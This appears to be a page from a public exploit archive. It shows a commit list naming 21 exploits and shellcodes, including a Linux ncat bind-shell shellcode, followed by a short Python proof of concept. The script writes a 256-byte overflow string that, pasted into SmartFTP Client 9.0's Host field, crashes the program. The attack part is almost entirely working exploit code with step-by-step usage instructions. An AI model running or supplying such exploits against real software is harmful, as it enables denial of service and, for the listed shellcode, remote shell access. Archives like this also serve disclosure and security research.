
21 changes to exploits/shellcodes SmartFTP Client 9.0.2623.0 - Denial of Service (PoC) LanSpy 2.0.1.159 - Local Buffer Overflow (PoC) XNU - POSIX Shared Memory Mappings have Incorrect Maximum Protection McAfee True Key - McAfee.TrueKey.Service Privilege Escalation DomainMOD 4.11.01 - Cross-Site Scripting DomainMOD 4.11.01 - 'raid' Cross-Site Scripting Tourism Website Blog - Remote Code Execution / SQL Injection Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery PrestaShop 1.6.x/1.7.x - Remote Code Execution DomainMOD 4.11.01 - Cross-Site Scripting PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion TP-Link wireless router Archer C1200 - Cross-Site Scripting Huawei B315s-22 - Information Leak ZTE ZXHN H168N - Improper Access Restrictions Sitecore CMS 8.2 - Cross-Site Scripting / Arbitrary File Disclosure IceWarp Mail Server 11.0.0.0 - Cross-Site Scripting Apache OFBiz 16.11.05 - Cross-Site Scripting HotelDruid 2.3.0 - 'id_utente_mod' SQL Injection WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection ThinkPHP 5.0.23/5.1.31 - Remote Code Execution Adobe ColdFusion 2018 - Arbitrary File Upload Linux/x86 - execve(/usr/bin/ncat -lvp 1337 -e /bin/bash)+Null-Free Shellcode (95 bytes)
22 lines
No EOL
693 B
Python
Executable file
22 lines
No EOL
693 B
Python
Executable file
# -*- coding: utf-8 -*-
|
|
# Exploit Title: SmartFTP 9.0 Build 2623 - Denial of Service (PoC)
|
|
# Date: 06/12/2018
|
|
# Exploit Author: Alejandra Sánchez
|
|
# Vendor Homepage: https://www.smartftp.com/en-us/
|
|
# Software Link: https://www.smartftp.com/get/SFTPMSI64.exe
|
|
# Version: 9.0.2623.0
|
|
# Tested on: Windows Server 2016 (x64)/ Windows 10 Single Language x64
|
|
|
|
# Steps to Produce the Crash:
|
|
# 1.- Run python code : python SmartFTPClient.py
|
|
# 2.- Open SmartFTPClient.txt and copy content to clipboard
|
|
# 3.- Open SmartFTP Client
|
|
# 4.- New connection
|
|
# 5.- Paste ClipBoard on Host
|
|
# 6.- Crashed
|
|
|
|
|
|
buffer = "\x41" * 256
|
|
f = open ("SmartFTPClient.txt", "w")
|
|
f.write(buffer)
|
|
f.close() |